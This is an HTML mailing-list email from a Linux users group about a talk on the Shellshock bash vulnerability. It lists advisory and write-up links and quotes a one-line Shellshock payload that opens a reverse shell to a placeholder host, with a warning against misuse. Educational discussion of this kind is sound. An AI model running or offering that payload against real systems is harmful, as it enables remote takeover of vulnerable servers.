<html><head><meta http-equiv="Content-Type" content="text/html charset=us-ascii"></head><body style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space;">On 25 Sep 2014, at 23:15, Gordon Gray <<a href="mailto:gordo.gray@gmail.com">gordo.gray@gmail.com</a>> wrote:<br><div><div><br class="Apple-interchange-newline"><blockquote type="cite"><div dir="ltr">sources from my talk earlier:<br><br>cve<br><a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271</a><br>better explanation<br><a href="http://seclists.org/oss-sec/2014/q3/650" target="_blank">http://seclists.org/oss-sec/2014/q3/650</a><br>easy to use poc<br><a href="https://pay.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/" target="_blank">https://pay.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/</a><div>pretty decent writeup<br><a href="http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html" target="_blank">http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html</a><br><div>ping scan</div><div><a href="http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html" target="_blank">http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html</a></div><div>local bash test<br><a href="http://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b" target="_blank">http://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b</a></div><div><br></div><div>and this is the live demo i would have done if my vps host wasn't being dos'd. 
don't run this on anything you don't (already) own<br>() { :; }; bash -i >& /dev/tcp/X.X.X.X/8080 0>&1<br><br>mail me to discuss public demos if you need to scare the shit out of your boss for a budget increase :)</div><div>but seriously, don't break the law. if you do it's not my fault. i'm not liable. don't sue me. ass covered.</div></div></div>
_______________________________________________<br>dundee GNU/Linux Users Group mailing list<br><a href="mailto:dundee@mailman.lug.org.uk">dundee@mailman.lug.org.uk</a> <a href="http://dundee.lug.org.uk">http://dundee.lug.org.uk</a><br><a href="https://mailman.lug.org.uk/mailman/listinfo/dundee">https://mailman.lug.org.uk/mailman/listinfo/dundee</a><br>Chat on IRC, #tlug on irc.lug.org.uk</blockquote></div><br></div><div>Well done on pulling that flash talk together last night Gordon, it was very good.<div><br></div><div>I am already reading articles in the press that are criticising Open Source software, in particular calling into question that bash appears to have a single maintainer and it follows on from the recent Heartbleed vulnerability.</div></div><div><br></div><div>Paul</div></body></html>